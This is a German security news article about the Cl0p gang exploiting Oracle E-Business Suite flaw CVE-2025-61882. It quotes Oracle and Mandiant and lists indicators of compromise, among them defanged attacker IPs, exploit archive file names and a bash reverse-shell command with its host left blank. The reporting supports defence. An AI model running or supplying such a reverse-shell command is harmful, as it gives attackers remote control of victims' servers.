© 2025 cybersecurityinfocus

Cl0p nutzt Schwachstelle bei Oracle aus

October 6 4:52 pm

Tags:

No tags

Die Cl0p-Bande nutzt Zero-Day-Schwachstelle bei Oracle für Cyberattacken aus.

Dragos Asaftei / Shutterstock

Oracle hat ein Notfall-Update veröffentlicht, um eine kritische Sicherheitslücke in seiner E-Business Suite (EBS) zu beheben. Das Leck mit Kennung CVE-2025-61882 hat einen CVSS-Score von 9,8 und wurde bereits bei der jüngsten Welle von Cl0p zum Diebstahl von Daten ausgenutzt.

Die Sicherheitslücke betrifft einen nicht näher bezeichneten Fehler, der es einem nicht authentifizierten Angreifer mit Netzwerkzugriff über HTTP ermöglichen soll, die Oracle Concurrent-Processing-Komponente zu kompromittieren und so die Kontrolle zu übernehmen.

Zugriff aus der Ferne

„Diese Sicherheitslücke kann ohne Authentifizierung remote ausgenutzt werden, also über ein Netzwerk, ohne Benutzername und Passwort“, so Oracle. Bei erfolgreichem Exploit sei ein Angreifer dann in der Lage, über die Sicherheitslücke aus der Ferne bösartigen Code ausführen.

Laut Rob Duhart, Chief Security Officer von Oracle, sollten Unternehmen auf Indikatoren für eine Kompromittierung (IoCs) achten. Die folgenden IP-Adressen und Artefakte deuteten dabei auf eine mögliche Beteiligung der Scattered LAPSUS$ Hunters-Gruppe an dem Exploit hin:

200.107.207[.]26 (Potenzielle GET- und POST-Aktivität)

185.181.60[.]11 (Potenzielle GET- und POST-Aktivität)

sh -c /bin/bash -i >& /dev/tcp// 0>&1 (Herstellen einer ausgehenden TCP-Verbindung über eine bestimmte port)

oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip

oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py

oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

Kompromittierung per Mail

Der Sicherheitsanbieter Mandiant beschreibt die Breaches als eine „massive E-Mail-Kampagne“, die von Hunderten kompromittierten Konten aus gestartet wurde. „Cl0p nutzte mehrere Schwachstellen in Oracle EBS aus und konnte so im August 2025 große Datenmengen von mehreren Opfern stehlen“, erklärte Charles Carmakal, CTO von Mandiant, in einem LinkedIn-Post.

Er fügte hinzu, dass mehrere Schwachstellen ausgenutzt wurden, darunter „Schwachstellen, die im Oracle-Update vom Juli 2025 gepatcht wurden, sowie eine, die an diesem Wochenende gepatcht wurde (CVE-2025-61882).“

Angesichts der bereits erfolgten, massenhaften Zero-Day-Ausnutzung (und der wahrscheinlich weiteren N-Day-Ausnutzung durch andere Akteure) sollten Unternehmen unabhängig vom Zeitpunkt der Patch-Anwendung prüfen, ob sie bereits kompromittiert wurden“, so Carmakal.

Categories

Prev
Next

No Responses

Leave a Reply

Your email address will not be published. Required fields are marked *

© 2025 cybersecurityinfocus. Built with ❤️ using WordPress and Ketos Theme.